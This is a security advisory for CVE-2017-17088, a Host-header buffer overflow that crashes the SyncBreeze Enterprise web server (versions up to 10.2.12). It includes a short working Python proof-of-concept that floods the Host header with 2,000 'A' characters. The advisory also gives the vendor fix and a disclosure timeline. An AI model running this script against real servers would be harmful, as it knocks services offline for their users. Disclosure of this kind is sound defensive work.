Sync Breeze 10.2.12 Denial Of Service

2017.12.17
Credit: Manuel
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

============================================= MGC ALERT 2017-007 - Original release date: November 30, 2017 - Last revised: December 14, 2017 - Discovered by: Manuel GarcAa CA!rdenas - Severity: 7,5/10 (CVSS Base Score) - CVE-ID: CVE-2017-17088 ============================================= I. VULNERABILITY ------------------------- SyncBreeze <= 10.2.12 - Denial of Service II. BACKGROUND ------------------------- SyncBreeze is a fast, powerful and reliable file synchronization solution for local disks, network shares, NAS storage devices and enterprise storage systems. III. DESCRIPTION ------------------------- The Enterprise version of SyncBreeze is affected by a Remote Denial of Service vulnerability. The web server does not check bounds when reading server request in the Host header on making a connection, resulting in a classic Buffer Overflow that causes a Denial of Service. To exploit the vulnerability only is needed use the version 1.1 of the HTTP protocol to interact with the application. IV. PROOF OF CONCEPT ------------------------- #!/usr/bin/python import sys, socket host = sys.argv[1] buffer="GET / HTTP/1.1\r\n" buffer+="Host: "+"A"*2000+"\r\n\r\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, 80)) s.send(buffer) s.close() V. BUSINESS IMPACT ------------------------- Availability compromise can result from these attacks. VI. SYSTEMS AFFECTED ------------------------- SyncBreeze <= 10.2.12 VII. SOLUTION ------------------------- Vendor release 10.3 version http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.3.14.exe VIII. REFERENCES ------------------------- http://www.syncbreeze.com/ IX. CREDITS ------------------------- This vulnerability has been discovered and reported by Manuel GarcAa CA!rdenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY ------------------------- November 30, 2017 1: Initial release December 14, 2017 2: Revision to send to lists XI. DISCLOSURE TIMELINE ------------------------- November 30, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas November 30, 2017 2: Send to vendor December 6, 2017 3: Vendor fix the vulnerability and release a new version December 14, 2017 4: Send to the Full-Disclosure lists XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT ------------------------- Manuel Garcia Cardenas Pentester


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top